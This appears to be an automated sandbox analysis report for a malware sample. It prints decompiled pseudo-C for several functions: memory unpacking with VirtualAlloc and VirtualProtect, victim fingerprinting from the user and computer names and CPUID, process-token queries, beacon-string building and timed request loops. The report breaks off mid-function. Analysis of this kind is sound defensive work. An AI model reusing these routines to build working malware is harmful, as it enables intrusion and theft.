Instruction Fuzzy Hash: 77814772D00119AFDF259FA5DC88AEEBBBDFF48300F10066AE505E6250D7319A55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E23C536, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000009EF,00003000,00000040,000009EF,-_^), ref: 6E23C5F0
VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040,6E23BFEF), ref: 6E23C627
VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6E23C687
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E23C6BD
VirtualProtect.KERNEL32(6E170000,00000000,00000004,6E23C515), ref: 6E23C7C2
VirtualProtect.KERNEL32(6E170000,00001000,00000004,6E23C515), ref: 6E23C7E9
VirtualProtect.KERNEL32(00000000,?,00000002,6E23C515), ref: 6E23C8B6
VirtualProtect.KERNEL32(00000000,?,00000002,6E23C515,?), ref: 6E23C90C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E23C928

Strings

-_^, xrefs: 6E23C5E4

Memory Dump Source

Source File: 00000004.00000002.730541593.000000006E23B000.00000040.00020000.sdmp, Offset: 6E23B000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID: -_^
API String ID: 2574235972-2116301257
Opcode ID: 5ccb745bd81504e9af754416eac276dfbf2b8732d61062dd7648f31a585e0766
Instruction ID: 3f16c60fbffdef4aeac1cf3f09260ba4f21cb1ee3a25b91a97aaee861e579c71
Opcode Fuzzy Hash: 5ccb745bd81504e9af754416eac276dfbf2b8732d61062dd7648f31a585e0766
Instruction Fuzzy Hash: 7DD189B6A20651DFDB108F54CC91B613BA7FF48B10B1A2196ED0A9F39ED371E8118B64

Uniqueness

Uniqueness Score: -1.00%

Function 02C92D6E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E02C92D6E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2c9d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02C9427C( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2c9d2a0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2c9d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02C946F9(_v8 + _v8, _t64);
							}
							HeapFree( *0x2c9d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2c9d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02C946F9(_v8 + _v8, _t64);
						}
						HeapFree( *0x2c9d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02c92d6e
0x02c92d76
0x02c92d7a
0x02c92d7d
0x02c92d82
0x02c92d84
0x02c92d89
0x02c92d89
0x02c92d8f
0x02c92d91
0x02c92d9e
0x02c92dff
0x02c92da0
0x02c92da5
0x02c92dab
0x02c92db0
0x02c92dbe
0x02c92dc2
0x02c92dd1
0x02c92dd8
0x02c92ddf
0x02c92ddf
0x02c92dea
0x02c92dea
0x02c92dc2
0x02c92db0
0x02c92e01
0x02c92e07
0x02c92e11
0x02c92e13
0x02c92e18
0x02c92e27
0x02c92e2b
0x02c92e36
0x02c92e3d
0x02c92e44
0x02c92e44
0x02c92e50
0x02c92e50
0x02c92e2b
0x02c92e5b
0x02c92e5d
0x02c92e60
0x02c92e62
0x02c92e65
0x02c92e68
0x02c92e72
0x02c92e76
0x02c92e7a

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02C92DA5
RtlAllocateHeap.NTDLL(00000000,?), ref: 02C92DBC
GetUserNameW.ADVAPI32(00000000,?), ref: 02C92DC9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02C95D80), ref: 02C92DEA
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02C92E11
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02C92E25
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02C92E32
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02C95D80), ref: 02C92E50

Strings

Uxt, xrefs: 02C92DEA, 02C92E50

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uxt
API String ID: 3239747167-1536154274
Opcode ID: 32e3ebebcce4ed8cc9016d42787aeab4ba1984ee08d60e4e4de45a50b69a9463
Instruction ID: 2f4c325e8bc0e99acd0f31a0474f156c9ee1f0ca9cefc01c795c6d9c5b297709
Opcode Fuzzy Hash: 32e3ebebcce4ed8cc9016d42787aeab4ba1984ee08d60e4e4de45a50b69a9463
Instruction Fuzzy Hash: 94313772A40205EFDB10EFA9C988B6AF7F9FB88704F114569E945E7210E730EE129B51

Uniqueness

Uniqueness Score: -1.00%

Function 02C91168, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02C91168(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02C97E20(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02C9A5FA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02c91175
0x02c91176
0x02c91177
0x02c91178
0x02c91179
0x02c9117d
0x02c91184
0x02c91193
0x02c91196
0x02c91199
0x02c911a0
0x02c911a3
0x02c911a6
0x02c911a9
0x02c911ac
0x02c911b7
0x02c911b9
0x02c911c2
0x02c911ca
0x02c911cc
0x02c911de
0x02c911e8
0x02c911ec
0x02c911fb
0x02c911ff
0x02c91208
0x02c91210
0x02c91210
0x02c91212
0x02c91212
0x02c9121a
0x02c91220
0x02c91224
0x02c91224
0x02c9122f

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02C911AF
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02C911C2
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02C911DE

Part of subcall function 02C97E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C98112), ref: 02C97E2C

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02C911FB
memcpy.NTDLL(00000000,00000000,0000001C), ref: 02C91208
NtClose.NTDLL(?), ref: 02C9121A
NtClose.NTDLL(00000000), ref: 02C91224

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: dfe2d9861990e3f52a2ac41212bdd7b047cdbd7cdbdedd78bcdf40d4b8386da4
Instruction ID: 619440fbe4868c9b9dc315a2dc88e152e53c02bf1442af63bcdf403f3f990dd6
Opcode Fuzzy Hash: dfe2d9861990e3f52a2ac41212bdd7b047cdbd7cdbdedd78bcdf40d4b8386da4
Instruction Fuzzy Hash: A22103B2940218BBDF01EFA4DC89ADEBFBDEB18750F104026F905E6110D7B18B54AFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C924B4, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 245
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02C924B4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x2c9d018; // 0x7c62a60e
				asm("bswap eax");
				_t61 =  *0x2c9d014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x2c9d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x2c9d00c; // 0x13d015ef
				asm("bswap eax");
				_t64 =  *0x2c9d2a4; // 0x24aa5a8
				_t3 = _t64 + 0x2c9e633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d154, _t63, _t62, _t61, _t60,  *0x2c9d02c,  *0x2c9d004, _t59);
				_t67 = E02C92914();
				_t68 =  *0x2c9d2a4; // 0x24aa5a8
				_t4 = _t68 + 0x2c9e673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E02C93F0E(_t135);
				_t134 = __imp__; // 0x74785520
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x2c9d2a4; // 0x24aa5a8
					_t7 = _t127 + 0x2c9e8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x2c9d238, 0, _v8);
				}
				_t73 = E02C91363();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x2c9d2a4; // 0x24aa5a8
					_t11 = _t122 + 0x2c9e8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x2c9d238, 0, _v8);
				}
				_t147 =  *0x2c9d32c; // 0x51495b0
				_t75 = E02C918D5(0x2c9d00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x2c9d238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x2c9d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x2c9d238, _t153, _v20);
						goto L26;
					}
					E02C96852(GetTickCount());
					_t82 =  *0x2c9d32c; // 0x51495b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x2c9d32c; // 0x51495b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x2c9d32c; // 0x51495b0
					_t149 = E02C98840(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						RtlFreeHeap( *0x2c9d238, _t153, _v8); // executed
						goto L25;
					}
					StrTrimA(_t149, 0x2c9c2ac);
					_push(_t149);
					_t94 = E02C98007();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						RtlFreeHeap( *0x2c9d238, _t153, _t149); // executed
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E02C91546(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E02C945F1();
						L22:
						HeapFree( *0x2c9d238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E02C92284(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_v12 = E02C95349(_t158, _a4, _a8, _a12);
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E02C9A5FA(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E02C988F0(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E02C9A5FA(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x02c924b4
0x02c924b4
0x02c924b4
0x02c924bd
0x02c924c6
0x02c924c8
0x02c924c8
0x02c924d5
0x02c924e0
0x02c924e3
0x02c924e8
0x02c924f1
0x02c924f4
0x02c924f9
0x02c924fc
0x02c92501
0x02c92504
0x02c92510
0x02c9251d
0x02c9251f
0x02c92525
0x02c9252a
0x02c92535
0x02c92537
0x02c9253a
0x02c9253c
0x02c92541
0x02c92547
0x02c9254c
0x02c9254f
0x02c92554
0x02c92561
0x02c92563
0x02c92569
0x02c92573
0x02c92573
0x02c92575
0x02c9257a
0x02c9257f
0x02c92582
0x02c92587
0x02c92594
0x02c92596
0x02c925a4
0x02c925a4
0x02c925a6
0x02c925b4
0x02c925b9
0x02c925bb
0x02c925c0
0x02c92783
0x02c9278d
0x02c92796
0x02c925c6
0x02c925d2
0x02c925d8
0x02c925dd
0x02c92777
0x02c92781
0x00000000
0x02c92781
0x02c925e9
0x02c925ee
0x02c925f7
0x02c92608
0x02c9260c
0x02c92615
0x02c9261b
0x02c9262a
0x02c92631
0x02c9263a
0x02c92640
0x02c9276b
0x02c92775
0x00000000
0x02c92775
0x02c9264c
0x02c92652
0x02c92653
0x02c92658
0x02c9265d
0x02c92761
0x02c92769
0x00000000
0x02c92769
0x02c92666
0x02c9266d
0x02c92675
0x02c9267a
0x02c92683
0x02c92689
0x02c92690
0x02c92695
0x02c9269a
0x02c92799
0x02c9274d
0x02c9274d
0x02c92752
0x02c9275d
0x02c9275f
0x00000000
0x02c9275f
0x02c926a4
0x02c926a9
0x02c926ae
0x02c926b3
0x02c926c3
0x02c926c6
0x02c926cc
0x02c926d2
0x02c926d8
0x02c926db
0x02c926e1
0x02c926e4
0x02c926e9
0x02c926ed
0x02c926ed
0x02c926f9
0x02c92705
0x02c92709
0x02c9270b
0x02c92710
0x02c92712
0x02c92717
0x02c9271c
0x02c92729
0x02c92731
0x02c92734
0x02c92734
0x02c92710
0x00000000
0x02c926fb
0x02c926ff
0x02c92736
0x02c92739
0x02c92742
0x00000000
0x00000000
0x00000000
0x00000000
0x02c92742
0x02c92701
0x00000000
0x02c92701
0x02c926f9

APIs

GetTickCount.KERNEL32 ref: 02C924C8
wsprintfA.USER32 ref: 02C92518
wsprintfA.USER32 ref: 02C92535
wsprintfA.USER32 ref: 02C92561
HeapFree.KERNEL32(00000000,?), ref: 02C92573
wsprintfA.USER32 ref: 02C92594
HeapFree.KERNEL32(00000000,?), ref: 02C925A4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02C925D2
GetTickCount.KERNEL32 ref: 02C925E3
RtlEnterCriticalSection.NTDLL(05149570), ref: 02C925F7
RtlLeaveCriticalSection.NTDLL(05149570), ref: 02C92615

Part of subcall function 02C98840: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,02C92AF0,?,051495B0), ref: 02C9886B
Part of subcall function 02C98840: lstrlen.KERNEL32(?,?,?,02C92AF0,?,051495B0), ref: 02C98873
Part of subcall function 02C98840: strcpy.NTDLL ref: 02C9888A
Part of subcall function 02C98840: lstrcat.KERNEL32(00000000,?), ref: 02C98895
Part of subcall function 02C98840: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02C92AF0,?,051495B0), ref: 02C988B2

StrTrimA.SHLWAPI(00000000,02C9C2AC,?,051495B0), ref: 02C9264C

Part of subcall function 02C98007: lstrlen.KERNEL32(05149918,00000000,00000000,770CC740,02C92B1B,00000000), ref: 02C98017
Part of subcall function 02C98007: lstrlen.KERNEL32(?), ref: 02C9801F
Part of subcall function 02C98007: lstrcpy.KERNEL32(00000000,05149918), ref: 02C98033
Part of subcall function 02C98007: lstrcat.KERNEL32(00000000,?), ref: 02C9803E

lstrcpy.KERNEL32(00000000,?), ref: 02C9266D
lstrcpy.KERNEL32(?,?), ref: 02C92675
lstrcat.KERNEL32(?,?), ref: 02C92683
lstrcat.KERNEL32(?,00000000), ref: 02C92689

Part of subcall function 02C91546: lstrlen.KERNEL32(?,00000000,02C9D330,00000001,02C967F7,02C9D00C,02C9D00C,00000000,00000005,00000000,00000000,?,?,?,02C941AA,02C95D90), ref: 02C9154F
Part of subcall function 02C91546: mbstowcs.NTDLL ref: 02C91576
Part of subcall function 02C91546: memset.NTDLL ref: 02C91588

wcstombs.NTDLL ref: 02C9271C

Part of subcall function 02C95349: SysAllocString.OLEAUT32(?), ref: 02C95384

Part of subcall function 02C9A5FA: HeapFree.KERNEL32(00000000,00000000,02C981B4,00000000,?,?,00000000), ref: 02C9A606

HeapFree.KERNEL32(00000000,?,?), ref: 02C9275D
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 02C92769
RtlFreeHeap.NTDLL(00000000,?,?,051495B0), ref: 02C92775
HeapFree.KERNEL32(00000000,?), ref: 02C92781
RtlFreeHeap.NTDLL(00000000,?), ref: 02C9278D

Strings

Uxt, xrefs: 02C92541

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID: Uxt
API String ID: 3748877296-1536154274
Opcode ID: e6e4046718a78eb2aecf86a7db9f9a1c0b26d5d7c1aa3703127e86283de15c4c
Instruction ID: d226c58525cfa2f641bfe81a5dadab8df45bda849cad4a3a713b3c95e78122fc
Opcode Fuzzy Hash: e6e4046718a78eb2aecf86a7db9f9a1c0b26d5d7c1aa3703127e86283de15c4c
Instruction Fuzzy Hash: D0914671900209AFCF11EFA4DC8CAAABBB9EF48314F144555F90AE7250C731DA61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C98494, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02C98494(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2c9d240);
					_v20 = 0;
					_v16 = 0;
					L02C9B078();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2c9d26c; // 0x314
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2c9d24c = 5;
						} else {
							_t68 = E02C9579B(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2c9d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02C98A1D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02C98634(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2c9d244);
							goto L21;
						} else {
							__eflags =  *0x2c9d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02C945F1();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2c9d248);
								L21:
								L02C9B078();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2c9d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x02c98494
0x02c984a6
0x02c984a9
0x02c984b5
0x02c984bb
0x02c984c0
0x02c98627
0x02c984c6
0x02c984c6
0x02c984c8
0x02c984cd
0x02c984ce
0x02c984d4
0x02c984d7
0x02c984da
0x02c984e8
0x02c984f3
0x02c984f6
0x02c984f8
0x02c98505
0x02c9850f
0x02c98511
0x02c98516
0x02c9851b
0x02c98526
0x02c98526
0x02c9851d
0x02c9851d
0x02c98524
0x00000000
0x00000000
0x02c98524
0x02c98530
0x00000000
0x02c98533
0x02c98537
0x02c98542
0x02c98542
0x02c98549
0x02c98552
0x02c98559
0x02c98562
0x02c98565
0x02c98568
0x02c9856d
0x02c98572
0x00000000
0x00000000
0x02c98574
0x02c98577
0x02c9857a
0x02c9857d
0x00000000
0x02c9857f
0x02c9858e
0x02c9858e
0x00000000
0x02c985bc
0x02c985bc
0x02c985c1
0x02c985e0
0x02c985e2
0x02c985e7
0x02c985e8
0x00000000
0x02c985c3
0x02c985c3
0x02c985c9
0x00000000
0x02c985cb
0x02c985cb
0x02c985d0
0x02c985d2
0x02c985d7
0x02c985d8
0x02c985ee
0x02c985ee
0x02c985f6
0x02c98601
0x02c98604
0x02c9860f
0x02c98611
0x02c98614
0x02c98616
0x00000000
0x02c9861c
0x00000000
0x02c9861c
0x02c98616
0x02c985c9
0x00000000
0x02c985c1
0x02c98591
0x02c98593
0x02c98596
0x02c98597
0x02c98597
0x02c9859b
0x02c985a5
0x02c985a5
0x02c985ab
0x02c985ae
0x02c985ae
0x02c985b4
0x02c985b4
0x02c98631
0x00000000

APIs

memset.NTDLL ref: 02C984A9
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02C984B5
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02C984DA
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02C984F6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C9850F
HeapFree.KERNEL32(00000000,00000000), ref: 02C985A5
CloseHandle.KERNEL32(?), ref: 02C985B4
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02C985EE
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02C95DBE,?), ref: 02C98604
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C9860F

Part of subcall function 02C9579B: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05149388,00000000,?,747DF710,00000000,747DF730), ref: 02C957EA
Part of subcall function 02C9579B: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,051493C0,?,00000000,30314549,00000014,004F0053,0514937C), ref: 02C95887
Part of subcall function 02C9579B: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02C98522), ref: 02C95899

GetLastError.KERNEL32 ref: 02C98621

Strings

@MxtNxt, xrefs: 02C98621
Uxt, xrefs: 02C985A5

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Uxt$@MxtNxt
API String ID: 3521023985-2342693527
Opcode ID: 241d3b829173b00ceccb75d7d1ab916f0776e411de8808369cd982b028e0a6a1
Instruction ID: e1e73c503c41212ca1a62b6797d01521812a55b3892bebc58e04b71b508b567e
Opcode Fuzzy Hash: 241d3b829173b00ceccb75d7d1ab916f0776e411de8808369cd982b028e0a6a1
Instruction Fuzzy Hash: C65146B1801228ABDF11EF95DC88AEEBFB9EF4A760F104616F511E3190D7308A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C981E7, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02C981E7(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
